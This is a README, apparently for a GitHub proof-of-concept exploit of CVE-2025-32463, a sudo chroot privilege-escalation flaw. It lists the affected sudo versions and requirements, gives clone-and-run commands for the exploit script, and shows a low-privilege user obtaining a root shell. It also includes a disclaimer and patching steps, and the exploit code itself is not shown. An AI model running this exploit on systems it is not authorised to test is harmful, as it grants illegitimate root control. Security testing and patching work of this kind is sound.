# CVE-2025-32463 – Sudo EoP Exploit (PoC) with precompiled .so# CVE-2025-32463 – Sudo EoP Exploit (PoC) with precompiled library
This repository contains a proof-of-concept (PoC) exploit for **CVE-2025-32463**, a local privilege escalation vulnerability in `sudo` discovered by Rich Mirch.
## Credit
https://github.com/kh4sh3i/CVE-2025-32463
## ⚠️ Disclaimer
This PoC is for **educational and authorized testing purposes only**. Do not use this code on systems you do not own or have explicit permission to assess.
---
## 🔧 Requirements
- sudo with chroot support (-R): version 1.9.14 to 1.9.17
- [nsswitch](https://en.wikipedia.org/wiki/Name_Service_Switch) enabled
## 🚀 How to run the POC
git clone https://github.com/zinzloun/CVE-2025-32463.git
cd CVE-2025-32463
Check if the current user has low privileges
:~/CVE-2025-32463$ id
uid=1001(poc) gid=1001(poc) groups=1001(poc),100(users)
Check requirements
:~/CVE-2025-32463$ sudo --version
Sudo version 1.9.15p5
...
:~/CVE-2025-32463$ ls -al /etc/nsswitch.conf
-rw-r--r-- 1 root root 526 Feb 16 20:57 /etc/nsswitch.conf
Run the exploit
:~/CVE-2025-32463$ chmod +x poc.sh && ./poc.sh
woot!
root@ubutes01:/# id
uid=0(root) gid=0(root) groups=0(root),100(users),1001(poc)
## 🚒 Remediation on Ubuntu 24.04 LTS
- For connected systems just run
sudo apt update && sudo apt upgrade
- For air gapped systems: you can obtain the last sudo package from here: https://github.com/sudo-project/sudo/releases/download/v1.9.17p1/sudo_1.9.17-2_ubu2404_amd64.deb. Once the package has been transfered to the target system, just run:
sudo dpkg -i sudo_1.9.17-2_ubu2404_amd64.deb
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view